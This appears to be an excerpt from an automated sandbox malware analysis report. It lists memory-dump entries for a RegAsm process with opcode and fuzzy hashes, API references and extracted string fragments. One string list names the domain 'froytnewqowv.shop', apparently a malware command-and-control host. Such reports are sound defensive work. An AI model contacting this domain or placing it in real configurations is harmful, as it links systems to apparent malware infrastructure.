        • Instruction ID: a76234b8b601e4b4d80af0162c0fefcc019d3c38ce0f577428fbbd3ce136ce75
        • Opcode Fuzzy Hash: 3dd72b256286a0f18d76cdbb97be187a757415dddf7a079ddd1879fdad43675e
        • Instruction Fuzzy Hash: 6F81BEF59183419BD700FF74DA0635EBEB0EB9230AF05886DD4C957342E6788558CBA7
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: +V5H$80I9$X\\h$r/!(
        • API String ID: 0-3448863506
        • Opcode ID: d09c4c3c1042168905b474b04dec1a4fafe80864aa2c59e2f9f0620160f356dd
        • Instruction ID: 1232547257af0d836ecf51d385a685c14159f690ef23018246b655c6a21f7de8
        • Opcode Fuzzy Hash: d09c4c3c1042168905b474b04dec1a4fafe80864aa2c59e2f9f0620160f356dd
        • Instruction Fuzzy Hash: 0262E070209B918BD324CF39D5903A7FBE1AF52305F584A5EC8EB4B792C738A845CB59
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: $F0l$xuy{
        • API String ID: 0-4033455903
        • Opcode ID: d4aa72209cdfe51b31e9bbf1ea66381a8b783033aa52dd2e276fd2dfaa7c6746
        • Instruction ID: 5975b3431e57897a2927422f2e4379087242e99e5fdc322d944cee440e883c9f
        • Opcode Fuzzy Hash: d4aa72209cdfe51b31e9bbf1ea66381a8b783033aa52dd2e276fd2dfaa7c6746
        • Instruction Fuzzy Hash: 4A327570505B928AD321CB35D5907EBBBE1AF16304F84485ED4EE9B382CB397509CFA8
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 0$2$FM?>$Kj
        • API String ID: 0-1586943010
        • Opcode ID: 7014bca55ce7f15b941fd14ae6b371cb11ea1bf1fc91f27b2d0b860ed8afaba8
        • Instruction ID: 3c4ba65a7b84b13bbd9c5b53dbd9a4e9748074ba4e39680f501424992c42f871
        • Opcode Fuzzy Hash: 7014bca55ce7f15b941fd14ae6b371cb11ea1bf1fc91f27b2d0b860ed8afaba8
        • Instruction Fuzzy Hash: 12329CB15083818FD324DF28C89076BBBE5AF96304F18497EE4C5A7392D739D849CB5A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 01$4`[b$F$vh
        • API String ID: 0-3121856630
        • Opcode ID: c75e08152cccaa52ea6f5e526d03dbe727129514ef236bc7209e1ee0a300ff63
        • Instruction ID: d93a5d47dbff73193ef47af5b034dd88a7392ad28107363cc044db854b817e77
        • Opcode Fuzzy Hash: c75e08152cccaa52ea6f5e526d03dbe727129514ef236bc7209e1ee0a300ff63
        • Instruction Fuzzy Hash: 9F22BB71608341ABC714CF28C981BABB7E1EF89354F54892DF4C9D72A1D778D891CB4A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b$PA$WP$ol
        • API String ID: 0-1411690081
        • Opcode ID: 0cb527afaef1abea81ae9eeaaf4590c194de4ed05548872f7baa8f450dbe5627
        • Instruction ID: aead440d2ca6fe7a1fd06a20e6f63a48c25d3b045c422a0e973e2d67a1ea3f0d
        • Opcode Fuzzy Hash: 0cb527afaef1abea81ae9eeaaf4590c194de4ed05548872f7baa8f450dbe5627
        • Instruction Fuzzy Hash: CC027A74208341CBC724DF28C5906ABB7F1FF89740F55892DE4C987261E738D98ADB9A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: %7$%7$TC
        • API String ID: 0-562761838
        • Opcode ID: 98285b28069c82770ffc23064106d89e2dd26c25d44d21ba6645de89e21dbe50
        • Instruction ID: a3390a0ea819f50f7e09a005f4fb0df624cd597feb74cf866aa404ef09407691
        • Opcode Fuzzy Hash: 98285b28069c82770ffc23064106d89e2dd26c25d44d21ba6645de89e21dbe50
        • Instruction Fuzzy Hash: 96420135A09206CFCB04CF28D8906AEB7F2FF8A304F29897DD985A7391D735A911CB55
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: )uw$/^A$^Y
        • API String ID: 0-867195589
        • Opcode ID: a6bb22a4967ca951d5a305e6ffd944ff0515d2462caa79e64008a8f28d3c9f51
        • Instruction ID: 99be8a06345161a7d2b48195821d81a54eebdd34de1f36dcd5d473763174f8cc
        • Opcode Fuzzy Hash: a6bb22a4967ca951d5a305e6ffd944ff0515d2462caa79e64008a8f28d3c9f51
        • Instruction Fuzzy Hash: CF22CEB09002168BDB24CF14C8A2BBBB7B2FF55314F198649D8565F395E339E981CB98
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: %7$%7$TC
        • API String ID: 0-562761838
        • Opcode ID: 735f6b988e88c19a902557fc86c11b8990785cf3a617012ce579f53b6f5eca15
        • Instruction ID: ad095b83308ca75fd8a4013f0ebfb119efa56f614bf737352143c9b46e94c767
        • Opcode Fuzzy Hash: 735f6b988e88c19a902557fc86c11b8990785cf3a617012ce579f53b6f5eca15
        • Instruction Fuzzy Hash: EB22FF35A04216CFCB04CF68D8906AFB7F2FF8A304F29896DD881A7395D735A911CB95
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b$4`[b$D
        • API String ID: 0-2855741908
        • Opcode ID: bee589adc475eb55dc856cc6db7432ca305c854b6497f41265853fe96f3c0c6b
        • Instruction ID: 4419554b97a4f5d847f5d9919b56110a744d44bceafc1c0fee32142145e074b9
        • Opcode Fuzzy Hash: bee589adc475eb55dc856cc6db7432ca305c854b6497f41265853fe96f3c0c6b
        • Instruction Fuzzy Hash: DC816BB4208340EFD3149F55D4A076BBBE5FF86305F50892DE1C6473A0C3799951CB8A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b$PA$WP
        • API String ID: 0-2416898959
        • Opcode ID: ff2d449f2aa4d9f3ffc758bd8431d95441b0a1be0e7da30d1f37c7a3b1d079e2
        • Instruction ID: 549f9a84d3ab0341397ba570cd15feaea4388fda82712428225536197b95a57b
        • Opcode Fuzzy Hash: ff2d449f2aa4d9f3ffc758bd8431d95441b0a1be0e7da30d1f37c7a3b1d079e2
        • Instruction Fuzzy Hash: E86156741083808BD724CF24D590AABB7E1FF8A304F689A2DE5D947361DB74D846CB8A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: %7$%7
        • API String ID: 0-3114740580
        • Opcode ID: 95702ab8c8dfd4ffedce7bff869b12acbd51280852a3c4ef4d7a9b65a7f033b5
        • Instruction ID: d4ddb7d9814fba6a3bd99f3c5521e18485b3bc3c6a052377e5f9b84667f3e06b
        • Opcode Fuzzy Hash: 95702ab8c8dfd4ffedce7bff869b12acbd51280852a3c4ef4d7a9b65a7f033b5
        • Instruction Fuzzy Hash: 8E221635A05216CFCB08CF68D9906AFB7F2FF8A304F28896DC841A7395D735A911CB95
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b$xy
        • API String ID: 0-3861070957
        • Opcode ID: 32874e9922531811730813ef1462c357581392f5c3e4b505af1d527c3c503f32
        • Instruction ID: 40080dca2f627201fa99e23294c6caa4fce92423dc08f85d2d2a9e2f3d3bfbd8
        • Opcode Fuzzy Hash: 32874e9922531811730813ef1462c357581392f5c3e4b505af1d527c3c503f32
        • Instruction Fuzzy Hash: ECD1DDB15482009BD715EF18C8D1B6BB7E1EF96354F04481EE4C687391E339E990CBAB
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b$A@
        • API String ID: 0-3080864223
        • Opcode ID: c85e80eada8b595bcd8dec67665edaffd9fe9b7f5aea5fcdfa1f5076c87ae2b5
        • Instruction ID: 667f5a27c419ae563cc22f1d67130efefa029fb26cebeccfba75b67c4bf04443
        • Opcode Fuzzy Hash: c85e80eada8b595bcd8dec67665edaffd9fe9b7f5aea5fcdfa1f5076c87ae2b5
        • Instruction Fuzzy Hash: 17C1BBB4E00228DFEF14CFA5E995BAEBB71FF06300F5040A9E50A6B252C7345A45CF99
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 476$@
        • API String ID: 0-1619901514
        • Opcode ID: 2edd24f0470ea495756651cbb646ca1a85ee499d5599157cfa72ce7a226500df
        • Instruction ID: 5274497a0d402a1b10b049c383913524a6e8a02ad7b7e978e53740151cc6be14
        • Opcode Fuzzy Hash: 2edd24f0470ea495756651cbb646ca1a85ee499d5599157cfa72ce7a226500df
        • Instruction Fuzzy Hash: C75126B06193008BD314DF19D49076BB7F2FFAA704F04A92EE1C58B361D73A9815DB5A
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6ba7beb733572661e7cbb272ad912ba2184529c14f0883f75aa874a1e5e795dc
        • Instruction ID: fddc4bbdbfca3ff58305c710f32b9e2df51800236505f9ed759e35df3333971b
        • Opcode Fuzzy Hash: 6ba7beb733572661e7cbb272ad912ba2184529c14f0883f75aa874a1e5e795dc
        • Instruction Fuzzy Hash: 3232EC75608602DFC704CF28D89066AB3E2FF8A304F49897DE8859B392D779EC51CB49
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: `;B
        • API String ID: 0-334945718
        • Opcode ID: 1e63d78b0c997ea6bf236997d86647c47950f5fb558d07b3a3ee316c9d9b5762
        • Instruction ID: 90752fbd8667fa49cb39373b4d57b7a022a3754a131126f3b9a8cd52922f7a36
        • Opcode Fuzzy Hash: 1e63d78b0c997ea6bf236997d86647c47950f5fb558d07b3a3ee316c9d9b5762
        • Instruction Fuzzy Hash: F202CEB4A00229CBDB18CF54D8A07AFB7B1FF46314F044599E8566F395E3789D41CBA8
        APIs
        • CoCreateInstance.OLE32(00441538,00000000,00000001,00441528), ref: 0041C429
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: CreateInstance
        • String ID:
        • API String ID: 542301482-0
        • Opcode ID: c423282a138e4dd69a8e8fda29ed07e9c2860de9418d6f5ac0c69db86ac4c56f
        • Instruction ID: efcd27da777c76614afb9578cb524e59ae1329c01c42d79ba0897e48e3ba55ec
        • Opcode Fuzzy Hash: c423282a138e4dd69a8e8fda29ed07e9c2860de9418d6f5ac0c69db86ac4c56f
        • Instruction Fuzzy Hash: 0051D1B1684314ABD7209B64CCD6BB773A5EF85368F044559F985CB390F378E880C76A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: %7
        • API String ID: 0-1474192009
        • Opcode ID: fa5061bea1924975d2a6e2ad4a31e45d729a66a877d82ee4640a8f01ee5eb968
        • Instruction ID: fd138ac7190559c5da5ffa1ae91ab7348a5179b75e8251a9d793bd0951800d51
        • Opcode Fuzzy Hash: fa5061bea1924975d2a6e2ad4a31e45d729a66a877d82ee4640a8f01ee5eb968
        • Instruction Fuzzy Hash: 81E1AE75E0111ACFCF04CFA9C9902AEB7B2FF8A704F288569C81177385D735A916CBA4
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: `;B
        • API String ID: 0-334945718
        • Opcode ID: b3f5026e5e7a75d893355743d3fbb4d30d028e4ef454329ca58d3df04e397ee8
        • Instruction ID: e79bb1402d12ca4e1089c1955cb7e4222a2cdeab4155382480d8270566b47ced
        • Opcode Fuzzy Hash: b3f5026e5e7a75d893355743d3fbb4d30d028e4ef454329ca58d3df04e397ee8
        • Instruction Fuzzy Hash: F691CDB4A0022ACBDB14CF58D8A1BAFB7B1FF46314F044589E855AF795E3789C41CB68
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 476
        • API String ID: 0-2414438958
        • Opcode ID: d238cba89d2b446ef2cf8b45a61c53fc1e564a3143f5e9f7368e2ea65fca4a10
        • Instruction ID: bc9afb301ff1bca705e4d9eb558f8990ed30c72b88509f03ea59d0d09f7ecfc7
        • Opcode Fuzzy Hash: d238cba89d2b446ef2cf8b45a61c53fc1e564a3143f5e9f7368e2ea65fca4a10
        • Instruction Fuzzy Hash: E351CEB5A482009BD314EF18D884B1BB3E2EB89704F1A992EE5C457351D336AC21CB9B
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitializeThunk
        • String ID: @
        • API String ID: 2994545307-2766056989
        • Opcode ID: 57e96b0382e3e6e538cf0754f49f31a1b9412dbe4e35433da61a86ebac4fb393
        • Instruction ID: 410551a823e52c8c58878a7ff6f4a4ed23e8846fe5adf79326dadfa67cdcf047
        • Opcode Fuzzy Hash: 57e96b0382e3e6e538cf0754f49f31a1b9412dbe4e35433da61a86ebac4fb393
        • Instruction Fuzzy Hash: 1541D4B19093019BD714DF25C851B2BB7E2FFC5318F299A1DE5951B3E0D3399806CB8A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitializeThunk
        • String ID: @
        • API String ID: 2994545307-2766056989
        • Opcode ID: 8902213a3a23ac088bbc10aa77979db359d26e75aebe188be7e2d487e3c549bf
        • Instruction ID: 258c2d8b245171ec294772d4e7ba01eafee234919c336b5a4c57a840b15ac809
        • Opcode Fuzzy Hash: 8902213a3a23ac088bbc10aa77979db359d26e75aebe188be7e2d487e3c549bf
        • Instruction Fuzzy Hash: 2131BE715083058BC700DF18D8C066FBBF5FF89314F14992DEA8897361D339A909CB6A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 9
        • API String ID: 0-2366072709
        • Opcode ID: eb63667419f5c6b71f3370b197ed23b76021c628920f3877b30b064b49acc9e7
        • Instruction ID: 5827e64180ae8c9ecbfa916954df96341b4aca638215bbeed84665d770a76ffe
        • Opcode Fuzzy Hash: eb63667419f5c6b71f3370b197ed23b76021c628920f3877b30b064b49acc9e7
        • Instruction Fuzzy Hash: E841007461C380AFC344CF24D49475ABBE0AB8A399F84592DE4CAA7262D374D994CB1A
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e994381109064e535aa2f66474e739f01fc4647a585f192f3a04191dfc298fe8
        • Instruction ID: bf4e49d12bc1c1665af36ef709e149d706979a2f605b67f4024150dc15a0677b
        • Opcode Fuzzy Hash: e994381109064e535aa2f66474e739f01fc4647a585f192f3a04191dfc298fe8
        • Instruction Fuzzy Hash: 6FC157B150C3808BD325EF19C480B9FBBE5AF96305F04092DE5C897392E37A9995CB5B
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 13e98caf799d70687418f30074ec28ba22caf06d3b054a4adcd8bbe707dd092a
        • Instruction ID: f79cfc653f8a236ff0e4eb88f2fa697002daeed1f849f636e8105431ebf0ed9b
        • Opcode Fuzzy Hash: 13e98caf799d70687418f30074ec28ba22caf06d3b054a4adcd8bbe707dd092a
        • Instruction Fuzzy Hash: 1A91CF74A083068FC714DF18D890A2BB3E1FF89754F14A92DE8958B361E734EC15CB8A
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5ac9207126e7abe7ab56eb8b70a6de2ce634be6cc43fbce52627eb7aa5cd22c8
        • Instruction ID: 5b4add5e1241a50acf4a0c27d19a57122d98eb62bacac81d48fa4c35dabefd35
        • Opcode Fuzzy Hash: 5ac9207126e7abe7ab56eb8b70a6de2ce634be6cc43fbce52627eb7aa5cd22c8
        • Instruction Fuzzy Hash: 1A6165B49003468FDB24CF96CA80AABBBB1FF45300F54899DD8562B7A5C334A945CF99
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0e79eff5b2934faaf7f26e72f9fcdb536e9fe95668bd4e1afbd2511dd540a17e
        • Instruction ID: 83b00c8cc46b3c421b1fb70478cb50fa9a587cc66f5d920c7afb7ad7d0a020ab
        • Opcode Fuzzy Hash: 0e79eff5b2934faaf7f26e72f9fcdb536e9fe95668bd4e1afbd2511dd540a17e
        • Instruction Fuzzy Hash: D15187B060C3408BD314DF19C490B2BBBE1EF96798F144A1DE1D59B3A1C7389980CB9B
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8b3d48c41490bc29c29131438a96206e9cd81afa1589dec8b0d555be26f5c051
        • Instruction ID: 6f21f8a450a4d2a471238150a230ac53d16a03e3977fccb7e2fd949729755662
        • Opcode Fuzzy Hash: 8b3d48c41490bc29c29131438a96206e9cd81afa1589dec8b0d555be26f5c051
        • Instruction Fuzzy Hash: B53197356142019BD7149E19C88092BBBE5EFC431AF148A3EE895A73C1D239ED52CB8A
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
        • Instruction ID: c944ce86796ee1d2d956b70cdcd2fc0150e1b0d4031ee3526a5232655da8fe44
        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
        • Instruction Fuzzy Hash: 2C110233A051D40EC3128D3C84106B5BFA31EA7274F5D939BE4F89B2E6D6268D8AC359
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0f9f778673f3e529b4aea6be0b8e9224fcb90e05f4f271bca4308f19bddaf4a2
        • Instruction ID: b8d9a0782c8c7c5e048b3628c10e4cd8915ff78df5a6c5e6c6960488fa35759b
        • Opcode Fuzzy Hash: 0f9f778673f3e529b4aea6be0b8e9224fcb90e05f4f271bca4308f19bddaf4a2
        • Instruction Fuzzy Hash: 1501B1F170032147DB209E12B4C4727B2A8EFD2708F08043EE80857342DB7DEC1486AE
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 09933760672cfd032ac23a4d7bbd6d2baf3617aa00eb7348fcbfb69fb9554c3a
        • Instruction ID: aa4d63c4c97277b62731f14bec90b410f018f391b3d7958cd39a62f9012a05af
        • Opcode Fuzzy Hash: 09933760672cfd032ac23a4d7bbd6d2baf3617aa00eb7348fcbfb69fb9554c3a
        • Instruction Fuzzy Hash: 87F05CB1A0411417DB22CD849CC4F77FBACCF87399F090426E8C1A7202F1755884C3EA
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 443b775d5de63c73ff5dc87661aef6e88c6616c394f33af0bd257110e714242a
        • Instruction ID: f032b11b1a9ddd9dc13c13fc807dcaf0e8db19b7f117900f85087f7b1a7806fa
        • Opcode Fuzzy Hash: 443b775d5de63c73ff5dc87661aef6e88c6616c394f33af0bd257110e714242a
        • Instruction Fuzzy Hash: D1E086BC8093128687009F10C8515BBB2B4AF87345F00285EE88157350F76CC985D36E
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
        • Instruction ID: 9c758fa7a215bf9c728fbebe32270771f8f9286419ee55b993ba3ab27b7309b8
        • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
        • Instruction Fuzzy Hash: 12D0A521508721465B7C8D199410577F7F0E9C7711F49955FF585D3244D234DC41C16D
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 660218fefaa52bd330ec99c342415da08580af5dc128e550123f5800ccb604d1
        • Instruction ID: 897859d0341ad2f3df62f084b9e9202fef533f110960bf7882fb236f00f8dbeb
        • Opcode Fuzzy Hash: 660218fefaa52bd330ec99c342415da08580af5dc128e550123f5800ccb604d1
        • Instruction Fuzzy Hash: F7900224E4C1408781008F009540479E379D38B111F60B5108008334198324E442454C
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "#$3m$c|{h$froytnewqowv.shop$tjch$xq$|nkx
        • API String ID: 0-2476188650
        • Opcode ID: efd6b1e2a11b404d8618c02436c24d13ef05f48848111e042e81429ad5ee1a06
        • Instruction ID: c23396bfd2754f0d8af95ff7610f3a380faea8e3d3387c487e16893230c2229d
        • Opcode Fuzzy Hash: efd6b1e2a11b404d8618c02436c24d13ef05f48848111e042e81429ad5ee1a06
        • Instruction Fuzzy Hash: 21B153B450E3D08BE331CF25C488B9BBBE5BB96304F144A6DE4C96B291C7399905CB97